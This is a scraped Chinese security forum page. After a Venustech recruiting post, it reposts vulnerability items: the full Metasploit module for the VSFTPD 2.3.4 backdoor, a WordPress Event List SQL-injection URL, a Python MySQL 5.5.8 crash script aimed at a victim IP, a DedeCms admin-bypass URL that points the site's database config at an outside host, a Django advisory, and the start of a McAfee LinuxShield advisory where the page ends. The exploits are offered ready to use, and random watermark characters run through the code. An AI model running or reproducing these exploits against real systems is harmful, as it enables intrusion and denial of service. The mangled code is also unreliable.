最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    ! A8 I4 \" u: w3 F; k6 n# ~# E3 i. p3 |1 L3 v3 w" Q

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    ) C8 V* q5 }5 V; p' f安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.$ `* _1 r2 j5 R# ^# e3 |/ ^# D
    精通C语言编程

    2.
    9 A# X3 m$ Q1 B( ?熟练使用Linux操作系统,精通 Linux下C语言编程

    3.# N6 A3 i- d. N5 j' b
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    + z1 l+ q( w& ]8 o4 ]熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    8 W' K5 ]! y% Q: j9 K8 t9 @熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    & k; H3 P0 Z1 P: }" y, Q; X1 |负责产品的系统测试、集成测试工作

    2.
    7 A2 K# t& H8 Z负责产品用例的编写,执行、修改

    3.& }- U9 H$ t9 p" f3 t% t( d4 p
    负责产品性能的测试

    4.1 w) `1 k2 p- V% n( |& A& B" d$ I
    负责对外项目的支持和测试工作

    岗位要求:

    1.' L0 u8 L' Y: Y! B4 R( v- e. E! u
    掌握基本的tcp/ip知识

    2.! W0 _: n* F& a" W
    数通基础好

    3.1 J& c1 k6 T7 j# l
    对linux有一定的基础

    4.
    7 S+ c% e- H' {, c掌握数据库的搭建和使用

    5.& c" n* Z. }7 c( e  B: q
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    $ V9 @% H/ G- j; U! {" Q熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    0 L2 [, [4 |8 F熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    - B* A9 E& R) J. q对网络安全设备在网络中的部署有一定的认识

    9.
    . g; p* [, l6 b  y, {% r掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    4 A9 r  `% ~+ @( f4 ]6 t% C# ~
    木&马检测服务、WEB漏洞扫描服务的实施

    2.8 ]# k3 c9 V" F. E3 f, Z1 d: |  N+ E
    对服务客户的技术支持

    3.
    ' o; Y9 J! m  X+ s
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.9 N$ W$ ]- r; [" u5 g% }; Q
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.+ r* B* A( Q; m  u! ]
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    $ M9 f3 r0 a3 X% i2 ^" k( [) g4 g

    1 j- H& Q6 l/ R/ _4 `( i8 N% A) I7 o- N/ {9 I- G" O
    require msf/core7 J4 d1 U  S+ s3 ~- ]' @' k( z
    $ Y) c1 d6 O" v+ D$ E5 k' u# C* o1 d
    class Metasploit3 < Msf::Exploit::Remote2 |2 ~/ g6 U% }5 C% [
    Rank = ExcellentRanking/ ~+ v4 |0 H  M: T) S! W& _) E

    % n8 {9 v2 l- ~1 Q" Q4 B. k8 A6 [include Msf::Exploit::Remote::Tcp9 Y9 F4 z. J/ ~# J! L+ W3 j+ J

    6 {/ B% T) j' G& Y# @; ^. p+ gdef initialize(info = {})+ i, @3 _- H: ?2 q( j1 [# @$ u
    super(update_info(info& e/ z7 k8 Z; s& ]
    Name => VSFTPD v2.3.4 Backdoor Command Execution0 }1 p& d* Z' D) S
    Descript_ion => %q{$ W4 m  \  s9 d* N
    This module exploits a malicious backdoor that was added to the VSFTPD download
    1 T9 s. L0 ^! @) uarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    / Z' w2 `. W7 t7 D. QJune 30th 2011 and July 1st 2011 according to the most recent information) B9 Z% {' ]6 Y! A, T! F# ~2 e
    available. This backdoor was removed on July 3rd 2011.
    1 m; [* r0 `0 [}' V9 j; H2 E6 D3 ]
    Author => [ hdm mc ]7 G% K0 o. M+ \' _+ C$ t
    License => MSF_LICENSE
    8 a: t/ L" v7 D# UVersion => $Revision: 13099 $
    % r# ^/ n' W: U) e4 e1 n8 o; vReferences =>
    % w. f3 v) u" u4 Z  H- @1 w* L: j[
    % c7 [& h0 N" d) x3 x[ URL http://pastebin.com/AetT9sS5]: [' \7 E; z# j
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]' |& B4 F. t/ a5 q+ u" C
    ]6 J) i7 d# c' [* R. _
    Privileged => true
    , `& p9 s/ w  O$ \# ?" QPlatform => [ unix ]& q" s7 L% }5 w
    Arch => ARCH_CMD
    8 k5 l, U' f% ]6 @! rPayload =>
    / M4 E' y; d# E' E) T0 i{( r. ~, u4 I3 y3 ~; W! D) N
    Space => 2000% O" l2 B8 E1 [  P! s
    BadChars => : S' U+ L5 \/ l; j
    DisableNops => true6 L) C/ t: j# s  b7 {
    Compat =>
    ( T  v3 {2 ?8 x' |( A9 c{% P5 P1 X; F. N  D: x2 q7 a5 Y' C
    PayloadType => cmd_interact
    + o3 B- O- n. t; @ConnectionType => find
    7 _* Q* W2 F* j9 N. ?3 L7 c}
    4 w. \3 w" U$ S/ S, b  x1 c7 V}9 U- q% V, H; z1 B. J* z- j
    Targets =>
    & X3 G4 k" T: B" B! L4 q5 z[
    5 R/ z  k) e- m. N7 d8 T[ Automatic { } ]. c; Z" ^( p7 X
    ]' O! X, M2 `! f4 ^7 A$ S
    DisclosureDate => Jul 3 2011: a! t4 v% J# o0 [: P
    DefaultTarget => 0))
    7 Y: m0 Q" _0 J* k" l/ t6 t) Q
    7 K8 M% I7 Y. o8 K$ E- @% ?6 Cregister_options([ Opt::RPORT(21) ] self.class)7 {. f! o) ]6 ~# F3 n4 Z5 ?- i0 z
    end
    - E5 K; t. Z: w3 r- ^% B0 L6 |" R" S$ O$ U* \
    def exploit0 L7 e# v7 N- |3 N9 a9 l: |* _
    ; \% X( |  X/ c; c) Z
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    # _0 h+ C- F) v: S4 P$ v: h! ~if nsock2 w, L6 o, O  G- N- k% C8 T# S
    print_status(The port used by the backdoor bind listener is already open)4 j4 T2 l7 {2 Z% v
    handle_backdoor(nsock)
    + B! a0 v# N1 f$ b( h5 |( ]4 @return' |2 m5 P; \3 E# b2 \1 E4 C
    end9 _5 d* m, f4 r. O

    0 J9 ~: v- o) w) m( `& `% g# Connect to the FTP service port first
    4 G" f7 @; b6 y5 F8 @connect
    ' M3 `4 C9 n( k- }3 E& A" Y3 H7 }" `$ R7 {4 Q
    banner = sock.get_once(-1 30).to_s! _# e6 B2 h5 F; ?; G. v$ C3 _, U
    print_status(Banner: #{banner.strip})9 W1 m$ F4 N1 @2 P  c) T
    1 b9 |" h  N6 Q, e
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    ! T9 V; Z& \1 ]" N2 X# E2 Z5 A)# K2 F. Z5 H& a" ^* q6 \( `
    resp = sock.get_once(-1 30).to_s
    + Z5 A( a( e3 S# Uprint_status(USER: #{resp.strip})
    ) r5 J+ R6 R/ E; V, f/ T
    1 y1 ~( m' N8 `- I( t) Qif resp =~ /^530 /8 L, d4 @/ K$ I5 |9 D+ M  G0 j4 _
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)% y7 _- z1 y# A( u$ g* H
    disconnect$ {& r. M8 b) U, ]# e$ d  F
    return
    % m: Y0 ^; L6 E' Mend4 x# @* m2 M7 {& P: J

    + D7 ^( ?2 k+ D$ f! `if resp !~ /^331 /
    , {% _% }5 \* Cprint_error(This server did not respond as expected: #{resp.strip})4 z; j) {( L" L) c/ A+ [: L+ y
    disconnect3 M# Y: \8 m- U  h
    return
    ( ]9 d8 n* |# D( S3 @7 Aend
    $ ]* R7 ]& R# [/ Q1 e3 {4 g9 F6 X4 n" m( c  o3 g& }
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
    ; |9 z. B6 r0 H! Z)3 e$ m/ m6 W) a2 P+ O& ?3 Z; z

    " d) e6 t. S" p  j! ~7 I' l# Do not bother reading the response from password just try the backdoor
    & c, U* D% ^/ @8 ansock = self.connect(false {RPORT => 6200}) rescue nil
    5 S/ O9 r0 G: Sif nsock
    " P1 v2 ^" Y: n$ S  ?/ X* ^print_good(Backdoor service has been spawned handling...)
    $ v- Y! ]; ^, U% q9 b( ghandle_backdoor(nsock)
    " U/ p2 P& f5 J6 ereturn7 d4 u* k' v% c2 ]! [2 T$ [
    end3 ]/ i( K  {' B
    6 O0 y; E" ?# O0 q) j5 g
    disconnect
    8 Y& ?; Q0 {3 Q* m/ j& C; V- k, N# ?5 j1 x9 ~7 O. `* D
    end* h! o& E7 p; X1 X$ }8 I' U3 t
    " _" X* f3 l4 V) _- H$ r9 F
    def handle_backdoor(s)
    " g' k4 G' x8 ]' R2 T0 ]+ X$ u  _  l+ [3 V+ S5 [' h
    s.put(id' P9 z1 w8 a9 A
    )) M9 d1 z3 O; c/ |' M

    8 F- v8 E! N6 P3 f; _1 [# _! ?r = s.get_once(-1 5).to_s
    % e0 g; ~6 E3 R' j1 |/ f+ D! D5 tif r !~ /uid=/; P6 @4 H, p; v4 a5 x* e
    print_error(The service on port 6200 does not appear to be a shell)
    & ~, T1 R8 J4 |# N' ~$ _disconnect(s)4 l. {; d, |7 [4 H( e
    return1 t& f/ F' ^- r9 B* [5 w
    end
    % _6 G, U! e2 B
    ! y. A( \3 p. fprint_good(UID: #{r.strip})
    8 E& L, k! j% a+ }9 ]6 ?5 ?/ F/ t8 [- ^& Z& f2 T( i
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)# O5 }3 M# F, g4 U) O
    handler(s)
    5 I8 R" F% R5 _0 t4 l3 l) Cend
    $ H5 K! ~4 d3 _: R
    ; }3 w. w: p- [* c7 f! i* h) k7 ^  h5 Lend复制代码" I4 p& O! z2 V; ?! u! Y
    0 d7 @9 P. ~9 @: z5 d7 i/ V
    5 U+ }8 q9 d0 ^4 I# l' {0 p, p
      v/ q( d9 U: T! I) o: X: T5 v
    - }7 b* B) E: E& E5 b; P
    6 Z3 @' {1 \9 o' C0 K' |

    8 v) d' ^3 e3 D& ^( G6 p- T7 P  B. @1 L* l/ p1 g$ x' y/ [
    + p4 {& R2 U$ y! K4 t& p* H& }4 w
      T  S6 m4 C5 ]0 c. t: Z
    2 V9 b, r. }/ q  K. N5 Z
    % Y. w; }0 V2 J, e1 h
    & P: _% S$ O8 Y' I9 e8 K

    , A% N8 t  b- U( s! j, K$ t! l0 P# H8 \5 A9 W& ~7 i
    8 r6 E9 Q2 s; I' y4 M* \+ \! {4 Z
    6 s/ ^8 o  b! U4 g8 ?5 S1 A0 a

    : h9 Z. q+ `7 }1 `, U7 o) J
    4 N. e0 ~, a) Z5 W; r/ q公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:4 o" j  \( n" Z
      3 ^( N: E" v- `- Z) d3 I. J
         1 C$ Q* J- ?- U* n6 R& J. P
      
    4 W( C1 H0 G4 Q2 j1 Y, D6 Q* cSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress6 b; R' r  `/ J$ x, i$ T- |4 O
    allows an authenticated user to execute arbitrary SQL commands via the id
    1 k) ?5 F8 j; Z- bparameter to wp-admin/admin.php.
    " U2 c) d& U: ~1 |( O# h$ B4 J" O  / I2 [+ x0 f7 f' G3 |! K, h! K
       6 p9 ]0 R* J% U' n; g- t. X5 ~) X
      
    " ^& T  q* q6 L! u" R2 k2. Proof of Concept:
    . O' P) I+ e' E7 l  " Y+ [1 S8 c2 S0 B( H) ^
       ! S( W$ l# s% i9 I3 d7 m! `8 W
      ! ?: @/ m! Z+ R2 u  J1 o
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    , F1 U' k& l9 \=1 AND SLEEP(10)) S( k! Z8 N. n

    9 p6 W- Z+ ^0 @2 k! ^% S7 X  7 n* W" _  @* E2 w; F6 Q
       3 ^! a4 V4 H. U
      
    - r# N! M& f  H8 C  I2 R3. Solution:
    3 e) R4 N# J' g5 ~2 w  . y6 R( i- h/ G
         
    9 N" H$ ]% x/ I# m  $ l& h# l  S# d3 L) l1 d
    The plugin has been removed from WordPress. Deactivate the plug-in and wait( N3 w/ L1 C2 f- |/ s
    for a hotfix.
    9 h. U! {. `4 V0 Q  / z3 {3 i& k: E  _
       / J& f" ^' [% i
      
    ! Y! Y5 S7 ]( Y( L# |+ [- y4. Reference:: N- o) V8 C( n# P  d) g# W, _
      
    7 G6 M! c- `4 U( M   ) C, A% C9 G3 n
      
    9 l- ~5 Q! A% `: V% chttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    2 w" T  T: T8 P' [ction-sqli/
    1 Z. Y% s/ w; b4 M7 w. f/ a  y, N* z  
    " {; ~& _" @5 d- h" S) n- d3 Yhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    8 u+ P( X/ O4 z2 M  u. l, [  S' Q2 i. V
    $ Q; j' E8 u0 M8 T$ H( j
    0 _3 l" v% M+ r  [- I" }) ~; K
    . H' A/ L  g  r- t# c5 U

    6 s( [5 x6 L% u* M
      y& n; v" P  a8 c
    " L% P: N* F1 R, C* }6 v
    9 p7 p& c1 Z0 D9 T( X; H. h/ G- E9 V- T: b4 W

    ( ]: P9 i" Z6 o; G) P$ A, h5 j1 B) H1 ?* h; [# g% S1 h

    * L7 z* F0 E# x1 B  A' P/ O, B6 k0 t3 L) o( C
    4 z4 Q2 H) U9 _
    $ @1 u  k" V2 ]' \2 B
    ( O& X& E. X* \& e& i
    ) M/ x% f1 U8 Y0 B# p# Q' f6 }
    * n: ^& D# N. r: S5 ^: w
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    3 h4 i# g6 [4 d% s; o# W ) m+ b7 t0 Z- Z, P3 X- g
    print ". n1 F3 p8 C* \1 N( v+ S9 y
    "
    * v' p5 v, M$ K1 M& o. R, J4 ^print "----------------------------------------------------------------"5 _' T# `) q5 m6 z" }
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"6 g+ b+ h' D+ @; \% t) u/ }( U
    print "| Level Smash the Stack                                         |"! w+ {  N$ T; t# ]4 X( `) H8 @5 M
    print "----------------------------------------------------------------"* E4 G: K7 _) l( N
    print "
    1 x! v& Z* A# ^- c  m2 I"
    5 m# W. j- n2 q7 h0 E ' n/ x7 e* k% F- G1 w5 i+ T% c
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"2 Y* M! G9 H2 v9 d* T# |! X
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")& {3 R, s/ D( W: c4 ]7 c
    ' q# D3 g5 ?( G3 q% K
    buf2=("x11x00x00x00x03set autocommit30")
    - n% e8 i8 [  Z/ {. D 8 w0 k6 Q. I- A2 L& ]4 P8 c
    def usage():- r3 H$ K, q) d5 @& l! {5 R
    print "usage : ./mysql.py <victim_ip>"; ]' m: U8 @: }/ X$ w
    print "example: ./mysql.py 192.168.1.22"
    & `, Q# H; I0 ?+ n/ J. J$ T2 j 4 a4 L3 k* _+ U: ~2 |- R

    ) J% {  J" @) Zdef main():, r6 j# E+ T8 P6 F, R
    if len(sys.argv) != 2:: [( C. W/ \4 C8 C
    usage()" Q# ~1 T- Z; V& V1 i& z- h
    sys.exit()* w, ?0 L' b; f) C9 w
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      ~, o( v# s1 v8 G5 B4 P
    / i8 r7 @, I7 THOST = sys.argv[1]  f' n- n- N9 W
    PORT = int(3306)
    ' c: c! A& b4 o. \4 }/ L; d; ^5 F  Fs.connect((HOST,PORT)). z  s' p9 j( q$ t' _9 _$ K
    print "
  • Connect"+ m  j+ r& V# ^! r1 X) v
    s.send(buf): y; n7 O% v, u  W/ k  a$ Q! g
    print "
  • Payload 1 sent"
    ) {: f  j( `" l8 W- }6 K; ts.send(buf2)& j( d: @  J* V+ v
    print "
  • Payload 2 sent% G9 J' k7 \6 P% x4 G  {9 u
    ", "
  • Run again to ensure it is down..5 y6 C  E  U. g; M
    "% f( y& u5 q% y
    s.close()
    1 Z1 d+ p  @2 ~1 Q* L( K % Z, N+ z/ \# ?  L- M/ }& a
    if __name__ == "__main__":; }7 |+ \7 ]! P' c* C) X
    main()
    , v, L( d$ E3 e& c9 a1 L9 m( m) k; \- `6 O
    7 }: r0 K2 l/ c) e
    9 x3 ~2 I. a6 `, P9 y1 [$ B6 R
    4 }2 B( {1 k9 A2 W: X3 R8 X- P0 Y9 O
    ' v" d/ l9 T, k5 _

    7 ^, n0 w; u2 y0 v9 ^) J  m% M& t2 }0 q0 ]3 R
    + O8 T" {! o  `# G7 t* i0 W6 |" ?

    2 ?) C9 v8 w  `- ]$ C$ D% g( u; r6 J- |2 d
    8 D! B8 p% g; u% M& d- n2 y1 D

    4 M2 E/ |2 p5 j# @& T- m) B6 v2 T$ h9 ~" A

    7 m' g' w9 P( i/ ~8 Z
    4 ~( l, c- G. o, a/ w! H  D
    + O, }& j5 u5 J' U, b
    + d6 H, h1 ]5 O; y6 v" K% I7 ~
    ' I- v# a2 T$ g! {% ?公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    6 R/ z! h  |3 l5 M1 F4 J& e
    http://www.sitedir.com.cn/video/4.swf& A+ J. E% v6 o* @: t

    ( _) F: q0 H2 ]- S! g8 N, k/ `9 W
    & i: R' B# ~  H- k+ [7 m& j* b  k/ N+ S. y& u. b

      b7 f& o) w# P: G! O. R; v! X7 k+ P% T1 y" L9 {5 P* _
    3 x3 Q2 [) z3 E; G) s

    ! R1 y' w  d* `; e/ c7 _+ x
    7 c6 w& T% `' i
    . v. g) Z) a7 i6 c: S6 y
    4 y/ u. l2 }- P8 u. a0 E5 r& h2 ]4 \( h" X
    ; h! R$ N0 i& q2 U: I/ y
    5 a  J- `  a0 K8 f% m% `* c

    8 P- w6 v5 X7 P* X
    1 k* x, V# E3 O8 M
    0 Q& R( K9 }  k3 [- o* }) b! f5 e6 {# n  f; J# G. s: z$ T# z  J  s
    5 r/ R6 S7 _9 o
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    $ Y/ A. d( a3 H2 X2 L1 e
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    8 c& i! s& W" s7 R8 T6 ~2 p! i$ J
    此漏洞的前提是必须得到后台路径才能实现
    ; f" \) Q6 A, ]( o0 ]2 l9 Y
    官方临时解决办法:

    ! l7 R& R( i- b
    找到include/common.inc.php文件,把:
    1 p2 \5 c0 G5 W: G9 j% c
        foreach($_REQUEST as $_k=>$_v)4 l- a/ B4 N1 C/ H
        {7 I2 R8 |4 r  v- @# `6 X2 |( f7 d1 O
            var_dump($_k);
    + t  W  s% f( C        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )  D- I8 w/ o" w$ o* w2 j
            {
    # y' h/ C! R$ L; Z2 {) ]            exit('Request var not allow!');2 C' c# J5 P6 v6 m; j6 C
            }: q) e5 G+ U/ [1 e
        }
    ' R7 W- O6 c0 J' ?) _
    换成:

    + k' ]& T6 O0 y9 N/ S7 F( `8 {
        //检查和注册外部提交的变量% A' b& d, ?" b) X/ x. y
        function CheckRequest(&amp;$val) {1 I4 f# ^0 N9 Q- d" v
            if (is_array($val)) {
    & |( m2 C1 u" W1 P/ k9 E            foreach ($val as $_k=>$_v) {
    0 V# k; X$ c/ J$ o) O                CheckRequest($_k);6 Q( M- u4 f+ p/ `2 K) r
                    CheckRequest($val[$_k]);5 ?2 R2 E2 O$ A& B4 F9 c8 }% U
                }
    - F% n( h! A- R# A. j; H5 z        } else
    * V3 x  A, k' b        {
    5 O1 L: d$ `" c) Z. U            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) ): m( N5 W4 D, M) f6 p2 e7 K
                {
    - \4 k) U" l# D3 R% ^/ i0 `7 {                exit('Request var not allow!');& F2 y0 ?! L* ^; K7 Z) s
                }
    $ _/ f1 z  ^3 u# [0 b4 v' k5 I        }
    3 i3 \* Y1 t  w+ c" L/ |9 j) K/ q; g    }1 P0 e0 x( X/ B! P: q6 t
        CheckRequest($_REQUEST);2 I7 m# G2 u+ v

      z! J, U3 S4 N% F3 [5 c2 W
    ( v. [, ^4 s! p8 r0 n& K4 Y: Y. w) s2 ^0 V; I" ^* A
    ' S- r0 X7 S: z! V  |5 S

    * x! K6 t3 x2 q
    / f( i8 K- C9 x' k/ F; b1 |: B$ [9 c. F9 L
    ( ?* Z0 m; U' I2 [1 h5 g8 s& V
    $ \2 e, I# ?( v0 S# S

    8 ^% B1 B" f2 p. \2 V
      g5 m# V! o; S
    8 z7 |- m* m0 a2 q& {: W
    ! Y7 U; y: R( R% T4 [+ E; N
    2 ?  v- z' ?1 L; Y7 t8 F: r  ^: o" f0 S' B) Y
    0 W7 d' \9 E* F7 d: k$ t$ _0 E
    9 O4 c1 s) _1 A; l6 L: G8 J* d8 |4 p

    1 j( `* R6 w7 @: j& r/ |  E8 t- Z+ z- @5 i
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>1 N, P$ ]. v9 T2 E7 i' X$ s- b

    * g1 ]) K$ _. `4 i3 U' shttp://www.sitedir.com.cn/video/8.swf[/quote]
    " U! k2 \( m  `- }8 C) m! n3 s2 P( x; U# Y
    8 b9 `1 q1 E- S5 p+ n8 h5 z& \
    % W; _6 g' e1 C) N( q" u
    , r- S- P; X: X

    ' ?: ^( p, v6 _! |9 ]
    ; V8 M9 q. u4 W$ d$ C# j( `! O: z& W+ B2 K6 f' e) a. E
    + l, ^) X! R5 |# L7 g1 ^" T

    ( t, h8 ~6 }" U; @5 m( C8 }2 m4 u$ i6 x7 s
      l* K) P2 \( A& y( u+ e0 J6 n
    9 t6 q) R7 s- S' {& J% ~0 Z5 z

    3 B" H( T0 V( E  L. f, k
    ( L3 h# d% |) `  u+ o( a% e4 a5 M+ B: q

    6 q( q; y" g. u" N: Q
    * W5 @  y6 P6 m  f* B+ @  F: j
    9 E, O2 i( b0 S6 V9 O公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    5 c, a2 g. _# \
    影响版本:2 r% {/ ]/ M1 g' Z7 I
    Django 1.2.5, G% B8 ^3 D6 s1 D8 ~# ~
    Django 1.3 beta 1, H0 P" e; b2 P8 R/ [
    Django 1.2.4
    " Y  R& K* V" Y$ Y! ]( [Django 1.2.2
    & p& F2 ]9 }) O8 ]6 X1 |4 dDjango 1.2

    7 E, e$ A# V7 C4 Z1 y: G; ~, b  D4 l
    漏洞描述:
    / Z! S" v* G$ C: ?# E+ v+ p# a9 y2 E
    Django是一款开放源代码的Web应用框架,由Python写成。
    & ~8 X! ]8 e. A2 G& ?3 ODjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
      T/ H/ C- s+ R1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。& K$ C' y# C- T6 c/ F; }
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    / _/ I  ~: Q0 o' B( {% _3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。. p+ Y: C9 L1 P) [: y1 P' }* w8 \4 G
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    $ D' ?( a/ q9 u! c9 \6 _
    细节参考:   T8 o* z( x3 ~( O' e+ a
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/' {/ s: c* y2 f0 M7 |# k7 c! i8 A
    http://secunia.com/advisories/45939/

    4 f" d' M, Q& r- b$ `( [
    ; u' q8 z* j/ o) y# B

    / B  k" Z9 P; w9 }  |
    0 a' b9 u# e. S& l) ]
    , |) p; F4 S3 L1 [' B8 M0 r/ P! T1 k! P

    5 d5 e- w3 {( ^; R. w7 w6 D$ O5 d, w' Y
    7 @3 v! Q3 e  V: r' \

    + k* [" r) N1 O5 ?5 c# ]0 d+ F& e# J( ?( f" R9 I- A+ x

    ! d$ f5 t' H: V8 Q5 S
    ' P) c& [* C8 I7 A* |
    / X1 y4 ]8 n/ W# G/ `" c& ?2 }: t# w0 Y
    2 t$ c# t; Y, k1 t* d9 |

    ! n' ]. Y4 l8 q9 y! M( F3 l. i. \6 y" A+ L) F1 S

    9 G2 d3 H6 d/ v( i9 m2 Q( D
    $ f5 c8 b% s4 [" \/ c! |公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code6 O: O( q. a) k3 w, E( \) a2 M3 ~
    影响版本: McAfee LinuxShield <= 1.5.1
    # O8 m( \. }& u: a6 ~: ^远程攻击: Yes ( ~/ y* T6 B: J% Z. C4 V* }+ [
    本地溢出: Yes+ w8 n& U* g% h; y5 K
    背景阅读:
    ( g* y5 i6 K+ H' I3 {===========
    & m9 \3 U$ N8 w: g% s
    " p3 m; f& A, _8 o+ z0 k+ _0 MLinuxShield detects and removes viruses and other potentially unwanted
    1 N- `9 E( d. u6 [4 \software on Linux-based systems. LinuxShield uses the powerful McAfee# Q: Q" t" \- l6 i6 s
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our( F  q% ^; |# E& I6 D. I
    anti-virus products.. c/ V1 K; f/ p6 F

    3 e  V' R) m$ P" A9 @5 G) `Although a few years ago, the Linux operating system was considered a4 B+ P/ [  E& A2 K6 s  a* X# Z
    secure environment, it is now seeing more occurrences of software1 |9 g# I4 i- n0 w2 h
    specifically written to attack or exploit security weaknesses in: ]* Z3 I! n) U% c' ~( I1 k
    Linux-based systems. Increasingly, Linux-based systems interact with! i: p  g7 I7 s8 A+ l# j% C
    Windows-based computers. Although viruses written to attack Windows-$ R  h  Q7 \0 ^% o% n1 f6 a
    based systems do not directly attack Linux systems, a Linux server
    . n* ]/ t% J# D6 ocan harbor these viruses, ready to infect any client that connects to6 ~7 f- W( p4 \) u. |2 W& ^$ J- v# q
    it.
    , f! L& F6 ~/ g/ x  t, k3 R) O$ s. H$ P4 J- F2 H6 k# C; C7 _7 l/ h' l
    When installed on your Linux systems, LinuxShield provides protection
    1 z6 Y# Q  @5 x2 d4 ~  \2 ?against viruses, Trojan horses, and other types of potentially
    $ K8 R" E0 O5 r& ounwanted software.3 d# K  s" c) @& n9 w+ x

    6 `+ i+ K: O7 q( m8 h7 F: @0 XLinuxShield scans files as they are opened and closed
    , F7 H5 r7 e3 }& V9 t?&amp;#65533;&amp;#65533; a technique
    4 @  h( |4 }- M0 B1 |, e" U) j7 r4 ]9 Yknown as on-access scanning. LinuxShield also incorporates an
    * }8 F% M5 w  X& @2 son-demand scanner that enables you to scan any directory or file in3 P" [! F' |, Y, S9 K& w& |: Y) M# N
    your host at any time.1 c6 z) g$ }! @( B9 l0 \  V6 A

    + D; K! Q; N* DWhen kept up-to-date with the latest virus-definition (DAT) files,
